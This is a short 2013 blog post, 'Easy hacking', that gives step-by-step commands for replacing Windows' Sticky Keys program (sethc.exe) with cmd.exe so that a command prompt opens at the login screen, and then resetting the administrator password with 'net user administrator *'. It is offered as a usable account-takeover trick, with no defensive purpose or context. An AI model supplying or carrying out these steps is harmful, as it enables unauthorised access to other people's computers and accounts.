Wednesday 13 November 2013

Easy hacking [Change/remove Windows ADMINISTRATOR password]

Here's an easy way to change/remove Windows Administrator Password.
This is the best and the simplest way to do it. Before starting, you should know about the basics of cmd commands like copy, move, ren etc


To change/remove Admin password, follow the following steps:
  • Insert Sevice Pack disk in CD-ROM and execute through command prompt
  • write the following commands in red step by step:
  • 1 copy c:\windows\system32\sethc.exe c:\progra~1 [copies "sethc.exe" to program files]
    2 copy c:\windows\system32\cmd.exe c:\docume~1 [copies "cmd.exe" to Documents and settings]
    3 ren c:\docume~1\cmd.exe sethc.exe [renames "cmd.exe" "sethc.exe"]
    4 copy c:\docume~1\sethc.exe c:\windows\system32 [copies the cmd file to system32 as "sethc.exe"]
  • Thats it......Now just restart your pc and press"shift" key five to six times and it will execute command promt [REASON: pressing shift key five to six times executes "Stick keys" file which is "sethc.exe", but we replaced it with cmd in the above steps]
When command prompt appears, then you can change the admin password with the following command: net user administrator *

NOTE: It cannot bypass admin priviledges, this is the basic method so if there are admin restrictions, then this probably wont work.

No comments:

Post a Comment

Popular Posts